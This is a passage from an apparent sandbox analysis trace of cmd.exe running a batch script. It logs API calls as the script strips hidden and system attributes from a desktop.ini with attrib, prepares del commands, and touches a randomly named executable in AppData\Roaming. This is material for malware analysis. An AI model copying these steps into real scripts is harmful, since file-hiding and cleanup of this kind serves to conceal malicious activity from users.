nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0205.535] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.535] 
GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0205.535] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0205.535] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0205.535] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0205.535] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0205.535] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0205.536] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0205.536] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0205.536] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0205.536] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0205.536] GetEnvironmentStringsW () returned 0x2c2600* [0205.536] FreeEnvironmentStringsW (penv=0x2c2600) returned 1 [0205.536] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.536] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0205.536] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0205.536] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0205.536] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0205.536] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0205.536] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0205.536] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0205.536] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0205.536] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0205.536] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f690 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.536] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f690, 
lpFilePart=0x12f68c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f68c*="Desktop") returned 0x18 [0205.536] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0205.536] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f40c | out: lpFindFileData=0x12f40c) returned 0x2c0c90 [0205.536] FindClose (in: hFindFile=0x2c0c90 | out: hFindFile=0x2c0c90) returned 1 [0205.537] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f40c | out: lpFindFileData=0x12f40c) returned 0x2c0c90 [0205.537] FindClose (in: hFindFile=0x2c0c90 | out: hFindFile=0x2c0c90) returned 1 [0205.537] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f40c | out: lpFindFileData=0x12f40c) returned 0x2c0c90 [0205.537] FindClose (in: hFindFile=0x2c0c90 | out: hFindFile=0x2c0c90) returned 1 [0205.537] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0205.537] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0205.537] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0205.537] GetEnvironmentStringsW () returned 0x2c04b0* [0205.537] FreeEnvironmentStringsW (penv=0x2c04b0) returned 1 [0205.537] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.538] GetConsoleOutputCP () returned 0x1b5 [0205.538] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.538] GetUserDefaultLCID () returned 0x409 [0205.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0205.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f7d0, cchData=128 | out: lpLCData="0") returned 2 [0205.538] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x21, lpLCData=0x12f7d0, cchData=128 | out: lpLCData="0") returned 2 [0205.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f7d0, cchData=128 | out: lpLCData="1") returned 2 [0205.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0205.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0205.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0205.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0205.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0205.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0205.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0205.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0205.539] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0205.539] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0205.539] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0205.540] GetConsoleTitleW (in: lpConsoleTitle=0x2b0ad0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.540] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0205.540] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0205.540] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0205.540] GetProcAddress (hModule=0x76910000, 
lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0205.541] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0205.541] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0205.541] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0205.541] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0205.541] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0205.541] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0205.541] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0205.543] _wcsicmp (_String1="del", _String2=")") returned 59 [0205.543] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0205.543] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0205.543] _wcsicmp (_String1="IF", _String2="del") returned 5 [0205.543] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0205.543] _wcsicmp (_String1="REM", _String2="del") returned 14 [0205.543] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0205.545] _wcsicmp (_String1="type", _String2=")") returned 75 [0205.545] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0205.545] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0205.545] _wcsicmp (_String1="IF", _String2="type") returned -11 [0205.545] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0205.545] _wcsicmp (_String1="REM", _String2="type") returned -2 [0205.545] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0205.617] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0205.617] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0205.622] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.623] FindClose (in: hFindFile=0x2c2560 | out: 
hFindFile=0x2c2560) returned 1 [0205.623] FindClose (in: hFindFile=0x2c2560 | out: hFindFile=0x2c2560) returned 1 [0205.623] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0205.623] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0205.623] GetConsoleTitleW (in: lpConsoleTitle=0x12f1f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.623] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f080, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f148 | out: lpAttributeList=0x12f080, lpSize=0x12f148) returned 1 [0205.623] UpdateProcThreadAttribute (in: lpAttributeList=0x12f080, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f140, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f080, lpPreviousValue=0x0) returned 1 [0205.623] GetStartupInfoW (in: lpStartupInfo=0x12f03c | out: lpStartupInfo=0x12f03c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0205.623] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0205.624] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f0dc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, 
hStdError=0x0), lpProcessInformation=0x12f128 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" ", lpProcessInformation=0x12f128*(hProcess=0x50, hThread=0x4c, dwProcessId=0xefc, dwThreadId=0x81c)) returned 1 [0205.630] CloseHandle (hObject=0x4c) returned 1 [0205.630] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0205.630] GetEnvironmentStringsW () returned 0x2c09e0* [0205.630] FreeEnvironmentStringsW (penv=0x2c09e0) returned 1 [0205.630] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0205.848] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12f01c | out: lpExitCode=0x12f01c*=0x0) returned 1 [0205.848] CloseHandle (hObject=0x50) returned 1 [0205.848] _vsnwprintf (in: _Buffer=0x12f164, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f028 | out: _Buffer="00000000") returned 8 [0205.848] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0205.848] GetEnvironmentStringsW () returned 0x2c25b0* [0205.848] FreeEnvironmentStringsW (penv=0x2c25b0) returned 1 [0205.848] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0205.848] GetEnvironmentStringsW () returned 0x2c25b0* [0205.848] FreeEnvironmentStringsW (penv=0x2c25b0) returned 1 [0205.849] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f080 | out: lpAttributeList=0x12f080) [0205.849] GetConsoleTitleW (in: lpConsoleTitle=0x12f400, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.849] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1\\desktop.ini")) returned 0xffffffff [0205.849] GetLastError () returned 0x2 [0205.849] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1")) returned 0x10 [0205.849] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0205.849] 
_wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0205.850] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1\\desktop.ini")) returned 0xffffffff [0205.850] GetLastError () returned 0x2 [0205.850] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12eeac | out: lpConsoleScreenBufferInfo=0x12eeac) returned 1 [0205.850] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0205.878] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0205.878] GetConsoleTitleW (in: lpConsoleTitle=0x12f39c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.879] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0205.879] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.880] GetFileType (hFile=0x50) returned 0x1 [0205.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.880] GetFileType (hFile=0x50) returned 0x1 [0205.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.880] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.882] GetFileType (hFile=0x50) returned 0x1 [0205.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.882] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.882] GetFileType (hFile=0x50) returned 0x1 [0205.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.882] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.882] GetFileType (hFile=0x50) returned 0x1 [0205.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.882] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.882] GetFileType (hFile=0x50) returned 0x1 [0205.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.882] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.883] GetFileType (hFile=0x50) returned 0x1 [0205.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.883] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.883] GetFileType (hFile=0x50) returned 0x1 [0205.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.883] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.883] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.883] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.883] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.883] GetFileType (hFile=0x50) returned 0x1 [0205.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.883] GetFileType (hFile=0x50) returned 0x1 [0205.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.883] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.883] GetFileType (hFile=0x50) returned 0x1 [0205.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.883] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] GetFileType (hFile=0x50) returned 0x1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] GetFileType 
(hFile=0x50) returned 0x1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] GetFileType (hFile=0x50) returned 0x1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] GetFileType (hFile=0x50) returned 0x1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] GetFileType (hFile=0x50) returned 0x1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.884] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.885] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.885] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.885] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] GetFileType (hFile=0x50) returned 0x1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] GetFileType (hFile=0x50) returned 0x1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] GetFileType (hFile=0x50) returned 0x1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] GetFileType (hFile=0x50) returned 0x1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] GetFileType (hFile=0x50) returned 0x1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] GetFileType (hFile=0x50) returned 0x1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, 
lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.886] GetFileType (hFile=0x50) returned 0x1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.886] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.886] GetFileType (hFile=0x50) returned 0x1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.886] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.886] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.886] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.886] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.886] GetFileType (hFile=0x50) returned 0x1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.886] GetFileType (hFile=0x50) returned 0x1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.886] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.886] GetFileType (hFile=0x50) returned 0x1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 
[0205.886] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] GetFileType (hFile=0x50) returned 0x1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] GetFileType (hFile=0x50) returned 0x1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: 